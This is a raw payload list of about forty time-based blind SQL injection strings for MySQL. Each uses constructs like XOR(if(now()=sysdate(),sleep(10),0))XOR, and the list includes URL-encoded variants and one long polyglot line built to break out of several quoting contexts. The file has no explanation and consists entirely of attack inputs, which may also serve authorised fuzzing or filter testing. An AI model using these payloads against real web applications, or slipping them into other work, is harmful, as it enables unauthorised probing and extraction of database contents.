0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z"
"0\"XOR(if(now()=sysdate(),sleep(10),0))XOR\"Z"
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
0%27XOR(if(now()=sysdate(),sleep(11),0))XOR%27Z
0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
0'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z
/orwa"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
orwa'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
0"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
0%27XOR(if(now()=sysdate(),sleep(11),0))XOR%27Z
0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
0'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(10),0)/"XOR(if(now()=sysdate(),sleep(10),0))OR"/if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 5=5)"/if(1=1,sleep(10),0)/*'XOR(if(1=1,sleep(10),0))OR'"XOR(if(1=1,sleep(10),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(10),0))OR"*/sleep(10)/*' or sleep(10) or '" or sleep(10) or "*/%2c(select%5*%5from%5(select(sleep(10)))a)
orwa"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
orwa'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
x/0"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
x/0%27XOR(if(now()=sysdate(),sleep(11),0))XOR%27Z
x/0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
x/0'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z
x/orwa"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
x/orwa'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(33),0))OR'
0'XOR(if(now()=sysdate(),sleep(8),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(5),0))XOR" 
"0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z"
